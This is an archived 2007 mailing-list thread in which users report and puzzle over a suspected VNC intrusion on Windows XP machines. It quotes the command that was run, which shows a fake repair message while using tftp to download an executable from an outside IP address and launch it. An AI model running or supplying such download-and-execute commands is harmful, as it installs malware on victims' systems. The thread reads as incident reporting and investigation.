On Fri, 2007-04-13 at 23:41 +1200, Russell McMahon wrote: > > My pc (xp pro sp2) is usually on and connected, and I often use > > tight-vnc, everything OK till I found this (see image) > > > > Someone executed this code: %comspec% /c echo Repairing user32.dll > > echo Please wait... & tftp -i 64.79.213.12 GET > > jijrtyw.exe & start jijrtyw& > > > > as a server address in 'TightVNC Viewer', appears an error message: > > "Failed to get server address" > > > > but a cmd.exe window was open and that code was executed > > I'm trying to investigate this issue, but I do not understand yet how > that could be possible. > > Do you have other VNC versions installed? Specifically, could it be > possible that you run RealVNC's version 4.1.1? > > While searching the Internet, I was able to find a number of reports > similar to this one (even the IP address was the same in many cases), > but what was strange is that versions and distributions of VNC > software > were different in different reports - TightVNC, UltraVNC, VNC4. > > Another strange thing is that VNC viewer is involved, while VNC server > is needed to connect to the machine. Are both server and viewer > vulnerable? -- I think that's not likely. Looks very strange... I saw the exact same thing on one of my machines a few weeks ago. The only difference was that was the first time that machine was directly connected to the internet (usually all my machines are behind a hardware firewall). Closing the VNC server resulted in not seeing it again. I wonder what it is. TTYL -- http://www.piclist.com PIC/SX FAQ & list archive View/change your membership options at http://mailman.mit.edu/mailman/listinfo/piclist